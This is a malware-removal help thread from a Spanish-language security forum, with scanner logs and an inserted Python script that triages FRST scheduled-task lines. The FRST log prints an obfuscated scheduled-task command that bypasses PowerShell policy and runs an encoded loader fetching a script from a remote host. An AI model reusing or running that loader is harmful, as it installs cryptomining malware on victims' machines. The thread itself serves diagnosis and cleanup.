Annoying Trojan/Malware

Hello, ForoSpyware community!

I recently noticed that my computer's performance had dropped a little. I decided to download an antivirus (Webroot SecureAnywhere) from a site of dubious reliability to see whether it was some annoying virus, and since then it has been much, much worse. I think I got infected with some Bitcoin-mining malware, because CPU usage went through the roof in processes that never used it before.

I have run several anti-malware programs since then and, by the look of it, managed to get rid of a few. However, I still have a Powershell.exe that, according to Malwarebytes, tries to connect to sites it shouldn't (t.zer2.com, lpp.zer2.com), and my PC's performance is far from its usual level.

What can I do? Many thanks in advance.

Hello @diegojmv, welcome to ForoSpyware

Carry out the following steps, even if you have already done some of them, without changing the order:

1) Download, install and run Malwarebytes' Anti-Malware.

  • Click “Use Malwarebytes Free”.

  • Click the “Open Malwarebytes Free” button.

[image]

  • Press the “Scan” button.

[image]

Once the scan finishes, the following screen will appear:

[image]

  • Click “View report”.

  • Then press the “Export” button. Choose “Text file”. Choose a name and save that file on the desktop…

2) Download AdwCleaner | InfoSpyware to the desktop.

  • Temporarily disable your antivirus >> How to temporarily disable your antivirus.
  • Also close every program you have open.
  • Run Adwcleaner.exe (if you use Windows Vista/7 or 8, right-click it and select "Run as administrator").
  • Press the Scan button and wait for the process to finish, then immediately press the Clean button.
  • Wait for it to complete and follow the instructions; if it asks you to restart the system, accept.
  • Save the report that appears, so you can copy and paste it in your next reply.
  • The report can also be found at C:\AdwCleaner\AdwCleaner[C1].txt

3) Download CCleaner

  • Install CCleaner
  • Open CCleaner; in the Cleaner tab leave the default configuration, click Analyze, wait for it to finish >> click Run Cleaner
  • Click the Registry tab >> click Scan for Issues, wait for it to finish >> click Fix Selected Issues and make a backup
  • Click Scan for Issues again until it finds none.

Paste the Malwarebytes and AdwCleaner reports and tell us how the problem is going.

How to paste reports in the forum?

Regards

No major changes. Malwarebytes detected a PUP (Search Manager) that keeps reinstalling itself despite being detected and deleted by both MB and AdwCleaner. The “Website blocked due to trojan” warning for PowerShell keeps appearing.

When I ran Malwarebytes before posting on the forum, I had problems with the Svchost.exe process; I still think it is acting strangely, but it causes no more trouble than the PowerShell issue.

I attach the Malwarebytes and AdwCleaner reports here.

# -------------------------------
# Malwarebytes AdwCleaner 7.4.2.0
# -------------------------------
# Build:    10-21-2019
# Database: 2019-11-20.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    11-23-2019
# Duration: 00:00:21
# OS:       Windows 10 Enterprise 2016 LTSB
# Cleaned:  18
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted       C:\ProgramData\IOBIT\Driver Booster
Deleted       C:\ProgramData\IObit\Advanced SystemCare
Deleted       C:\Users\Alfredo y Diego\AppData\Roaming\IOBIT\Driver Booster
Deleted       C:\Users\Alfredo y Diego\AppData\Roaming\IObit\Advanced SystemCare
Deleted       C:\Users\Alfredo y Diego\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\mipony
Deleted       C:\Users\Alfredo y Diego\AppData\Roaming\mipony

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\DRIVER BOOSTER SKIPUAC (ALFREDO Y DIEGO)

***** [ Registry ] *****

Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{79B62BEC-A7C5-4D0E-8641-7F08A0BAC88A} 
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{79B62BEC-A7C5-4D0E-8641-7F08A0BAC88A} 
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DRIVER BOOSTER SKIPUAC (ALFREDO Y DIEGO)
Deleted       HKLM\Software\Classes\mipony
Deleted       HKLM\Software\Classes\mpybrowser
Deleted       HKLM\Software\IObit\Driver Booster

***** [ Chromium (and derivatives) ] *****

Deleted       Search Manager
Deleted       Search Manager
Deleted       Search Manager
Deleted       Touch VPN
Deleted       User-Agent Switcher for Chrome

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner_Debug.log - [26365 octets] - [23/11/2019 22:33:03]
AdwCleaner[S00].txt - [2802 octets] - [23/11/2019 22:34:19]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 23/11/19
Hora del análisis: 21:51
Archivo de registro: 0098a088-0e5d-11ea-9d95-0019666d7174.json

-Información del software-
Versión: 4.0.4.49
Versión de los componentes: 1.0.750
Versión del paquete de actualización: 1.0.15326
Licencia: Prueba

-Información del sistema-
SO: Windows 10 (Build 14393.0)
CPU: x86
Sistema de archivos: NTFS
Usuario: DESKTOP-227CIGF\Alfredo y Diego

-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 192178
Amenazas detectadas: 18
Amenazas en cuarentena: 18
Tiempo transcurrido: 33 min, 2 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 0
(No hay elementos maliciosos detectados)

Valor del registro: 0
(No hay elementos maliciosos detectados)

Datos del registro: 0
(No hay elementos maliciosos detectados)

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 3
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 282, 628563, , , , 
PUP.Optional.ASK, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 2, 454825, , , , 
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 282, 626729, , , , 

Archivo: 15
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Sustituido, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Sustituido, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000017.ldb, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000019.ldb, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000020.log, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000021.ldb, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Sustituido, 282, 628563, 1.0.15326, , ame, 
PUP.Optional.ASK, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sustituido, 2, 454825, 1.0.15326, , ame, 
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Sustituido, 282, 626729, 1.0.15326, , ame, 

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)

Cheers!

Hello

Temporarily disable your antivirus >> How to temporarily disable your antivirus

Download Farbar Recovery Scan Tool, choosing the version that matches your computer's architecture (32 or 64 bit). → How do I know whether my Windows is 32 or 64 bit?

  • Run FRST.exe.
  • At the Disclaimer window, click Yes.
  • In the main window click the Scan button and wait for the process to finish.
  • Two (2) files (logs), Frst.txt and Addition.txt, will open; they are saved on the desktop.

Post the two reports generated.

You must copy and paste them with their full contents, and use several messages if you get an error message saying it is too long (more than approx. 50,000 characters).

Regards
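As an added example for this thread (not part of FRST, Malwarebytes or AdwCleaner, and not posted by anyone in it), here is a small Python triage script for the "Task:" lines that FRST.txt prints in its Scheduled Tasks section: it flags entries FRST marks with ATTENTION, orphaned tasks, encoded PowerShell actions, a command name assembled from an environment variable, and task folders that only look like Microsoft's. The sample lines are constructed for the demo; the encoded command inside them is a harmless Write-Host so the decoder can be shown safely.

```python
"""Triage of the 'Task:' lines in an FRST.txt Scheduled Tasks section.

Added example for this thread; it is not part of FRST, Malwarebytes or
AdwCleaner. The line layout follows what FRST prints:
    Task: {GUID} - <task path> => <action>
    Task: {GUID} - <task path> -> No File <==== ATTENTION
The sample lines at the bottom are constructed for the demo.
"""
import base64
import re
from typing import List, Optional

TASK_RE = re.compile(r"^Task:\s+(\{[0-9A-Fa-f-]+\})\s+-\s+(.*?)\s+(=>|->)\s+(.*)$")
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (FRST may cut it short)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# 'set X=...& ... %X%': the executable name is only assembled when cmd runs
SPLIT_RE = re.compile(r"set\s+(\w+)=[^&]*&.*%\1%", re.I)
BYPASS_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)
TRUNC_RE = re.compile(r"\(the data entry has (\d+) more characters\)")


def decode_encoded_command(b64: str) -> str:
    """Best-effort decode of an -EncodedCommand value (base64 of UTF-16LE).

    FRST truncates long actions, so the blob may not end on a 4-character
    boundary; decode the longest complete prefix and drop a dangling odd
    byte so the analyst still sees how the script starts.
    """
    usable = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(usable)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16le", errors="replace")


def triage_task_line(line: str) -> Optional[dict]:
    """Parse one FRST task line; return a record with the reasons it looks suspicious."""
    m = TASK_RE.match(line.strip())
    if not m:
        return None
    guid, path, arrow, action = m.groups()
    reasons: List[str] = []
    decoded = ""
    if "<==== ATTENTION" in action:
        reasons.append("flagged by FRST")
    if arrow == "->" and action.startswith("No File"):
        reasons.append("task points to a file that no longer exists")
    # A tree folder spelt like Microsoft's but not exactly 'Microsoft'
    for part in path.split("\\"):
        if part.lower() == "microsoft" and part != "Microsoft":
            reasons.append(f"task tree folder '{part}' mimics 'Microsoft'")
    if SPLIT_RE.search(action):
        reasons.append("command name assembled from an environment variable")
    if BYPASS_RE.search(action):
        reasons.append("PowerShell execution policy bypass")
    enc = ENCODED_RE.search(action)
    if enc:
        reasons.append("PowerShell encoded command")
        decoded = decode_encoded_command(enc.group(1))
        cut = TRUNC_RE.search(action)
        if cut:
            reasons.append(f"action truncated by FRST ({cut.group(1)} chars not shown)")
    return {"guid": guid, "path": path, "action": action,
            "reasons": reasons, "decoded": decoded}


def triage_frst_tasks(text: str) -> List[dict]:
    """Return the records of all task lines that raised at least one reason."""
    hits = []
    for line in text.splitlines():
        rec = triage_task_line(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


# Constructed sample: a benign updater task, a task shaped like the one in the
# log above but carrying a harmless encoded Write-Host, and an orphaned task.
BENIGN_ENCODED = base64.b64encode("Write-Host 'hello'".encode("utf-16le")).decode()
SAMPLE_FRST_TASKS = "\n".join([
    r"Task: {134BA36C-7B66-47C4-912C-BA8B4DFE7A56} - System32\Tasks\CCleanerSkipUAC"
    r" => C:\Program Files\CCleaner\CCleaner.exe [14544792 2018-10-23] (Piriform Software Ltd -> Piriform Ltd)",
    r"Task: {D637D5F4-3706-45D2-9DED-A40EB449CDE9} - System32\Tasks\MicroSoft\Windows\owBmpfYO\JpNYrnb"
    ' => cmd /c "set A=power& call %A%shell -ep bypass -e ' + BENIGN_ENCODED[:-4]
    + " (the data entry has 586 more characters).",
    r"Task: {FEE784E9-0FE0-4E99-9F72-131A85CDE224} - \VQMUsn\GXQxU -> No File <==== ATTENTION",
])

if __name__ == "__main__":
    for rec in triage_frst_tasks(SAMPLE_FRST_TASKS):
        print(rec["guid"], rec["path"])
        for reason in rec["reasons"]:
            print("   -", reason)
        if rec["decoded"]:
            print("   decoded prefix:", repr(rec["decoded"]))
```

Run it against the Scheduled Tasks section of a real FRST.txt and it reports only the lines worth a closer look, with the start of any encoded script decoded for the analyst.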

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 23-11-2019
Ran by Alfredo y Diego (administrator) on DESKTOP-227CIGF (24-11-2019 07:41:27)
Running from C:\Users\Alfredo y Diego\Downloads
Loaded Profiles: Alfredo y Diego (Available Profiles: defaultuser0 & Alfredo y Diego)
Platform: Microsoft Windows 10 Enterprise 2016 LTSB Version 1607 (X86) Language: Español (España, internacional)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Ivaylo Beltchev -> IvoSoft) [File not signed] C:\Program Files\Classic Shell\ClassicStartMenu.exe
(Kilonova LLC -> Skillbrains) C:\Program Files\Skillbrains\lightshot\5.5.0.4\Lightshot.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [150840 2017-08-13] (Ivaylo Beltchev -> IvoSoft) [File not signed]
HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [226728 2019-07-21] (Kilonova LLC -> )
HKLM\...\Run: [] => [X]
HKLM\...\Policies\Explorer: [SettingsPageVisibility] hide:gaming-broadcasting;gaming-gamebar;gaming-gamedvr;gaming-gamemode;gaming-trueplay;gaming-xboxnetworking;maps;pen;recovery;speech;tabletmode;windowsdefender;windowsinsider
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [NetLimiter] => "C:\Program Files\Locktime Software\NetLimiter 4\nlclientapp.exe" /minimized
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [] => [X]
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Winlogon: [Shell] C:\Windows\explorer.exe [4312248 2016-07-16] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\78.0.3904.108\Installer\chrmstp.exe [2019-11-21] (Google LLC -> Google LLC)
Startup: C:\Users\Alfredo y Diego\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2018-12-22]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Welcome.lnk [2017-11-09]
ShortcutTarget: Welcome.lnk -> C:\Welcome\Welcome.exe () [File not signed]

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {10B4A9FC-1BCE-45C1-AC7C-708121265D8D} - System32\Tasks\Opera scheduled Autoupdate 1533575745 => C:\Users\Alfredo y Diego\AppData\Local\Programs\Opera\launcher.exe [1346584 2019-11-20] (Opera Software AS -> Opera Software)
Task: {134BA36C-7B66-47C4-912C-BA8B4DFE7A56} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [14544792 2018-10-23] (Piriform Software Ltd -> Piriform Ltd)
Task: {1839AB19-E1C3-4278-A318-52E48F8A62DA} - System32\Tasks\Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate => {FE285C8C-5360-41C1-A700-045501C740DE} C:\Windows\System32\ErrorDetailsUpdate.dll [63488 2016-07-16] (Microsoft Windows -> Microsoft Corporation)
Task: {2B10C4A1-F875-4DF6-A043-3615AC94371C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-07-19] (Google Inc -> Google Inc.)
Task: {31D84961-0CA5-4EB5-B11E-ECABE1DBF789} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-06-22] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {4E5E5049-B160-4913-8357-06D9512C5962} - System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task => {35EF4182-F900-4632-B072-8639E4478A61}
Task: {5C31AC9F-879B-4147-BA8E-554E06A73DAD} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {62C6AF69-71CD-4E55-A5D0-B0522BCFDCDE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [124632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {7F857067-CFDB-4E63-ACC8-A24DE4CF9F6F} - System32\Tasks\{2A3E5AA4-AD05-45CD-A693-C23160DA1F7B} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}\Setup.exe" -c -runfromtemp  -removeonly
Task: {87402BF2-539F-45AA-B6A8-686921A45CD0} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [1542536 2019-11-05] (AVAST Software s.r.o. -> AVAST Software)
Task: {89D42200-1137-4BBF-B9A7-B58C28210C11} - System32\Tasks\Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate => {9CDA66BE-3271-4723-8D35-DD834C58AD92} C:\Windows\System32\ErrorDetailsUpdate.dll [63488 2016-07-16] (Microsoft Windows -> Microsoft Corporation)
Task: {8A30ECD0-593E-4E02-A997-F3FCC2F7D2F2} - System32\Tasks\update-sys => C:\Program Files\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {AFB09559-C01C-4F90-AC21-217EB6639FE1} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {B889B515-7158-4ADC-88FB-3BC8C642122F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-07-19] (Google Inc -> Google Inc.)
Task: {D637D5F4-3706-45D2-9DED-A40EB449CDE9} - System32\Tasks\MicroSoft\Windows\owBmpfYO\JpNYrnb => cmd /c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBNAGkAYwByAG8AUwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABvAHcAQgBtAHAAZgBZAE8AXABKAHAATgBZAHIAbgBiACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAbQB4AG4AeQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBpAGcAXwAyADA (the data entry has 586 more characters).
Task: {E6B4A644-016A-4E3F-B7BC-FB319C3790EF} - System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task => {35EF4182-F900-4632-B072-8639E4478A61}
Task: {E7A42ECA-97F1-41DB-8311-ACC62E78CCE3} - System32\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001 => C:\Program Files\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {FA6F4456-C5F8-4826-8957-509ED3D3BD3C} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-1270689601-2402022770-626450427-1001 => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\MEGAupdater.exe [760696 2018-01-15] (Mega Limited -> Mega Limited)
Task: {FEE784E9-0FE0-4E99-9F72-131A85CDE224} - \VQMUsn\GXQxU -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
Task: C:\Windows\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001.job => C:\Program Files\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files\Skillbrains\Updater\Updater.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 200.109.78.12 200.44.32.12
Tcpip\..\Interfaces\{c3e01d16-c60a-49b1-906e-d8657b76b1b6}: [NameServer] 1.1.1.1,1.0.0.1
Tcpip\..\Interfaces\{c3e01d16-c60a-49b1-906e-d8657b76b1b6}: [DhcpNameServer] 200.109.78.12 200.44.32.12

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072623682\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072624070\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/es-ve/?ocid=iehp
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/es-ve/?ocid=iehp
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 5f6kh6xh.default
FF ProfilePath: C:\Users\Alfredo y Diego\AppData\Roaming\Mozilla\Firefox\Profiles\5f6kh6xh.default [2019-11-23]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_31_0_0_108.dll [2018-09-29] (Adobe Systems Incorporated -> )
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)

Chrome: 
=======
CHR HomePage: Default -> hxxp://go.microsoft.com/fwlink/?LinkId=69157
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Notifications: Default -> hxxps://freebitco.in; hxxps://tweetdeck.twitter.com; hxxps://web.whatsapp.com; hxxps://www.facebook.com; hxxps://www.instagram.com
CHR Profile: C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default [2019-11-24]
CHR Extension: (Presentaciones) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-07-19]
CHR Extension: (Documentos) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-07-19]
CHR Extension: (Google Drive) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-16]
CHR Extension: (Touch VPN) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2019-11-23]
CHR Extension: (YouTube) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-19]
CHR Extension: (Chrome IG Story) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-01-05]
CHR Extension: (DownAlbum) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgjnhhjpfcdhbhlcmmjppicjmgfkppok [2019-11-16]
CHR Extension: (uBlock Origin) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-11-06]
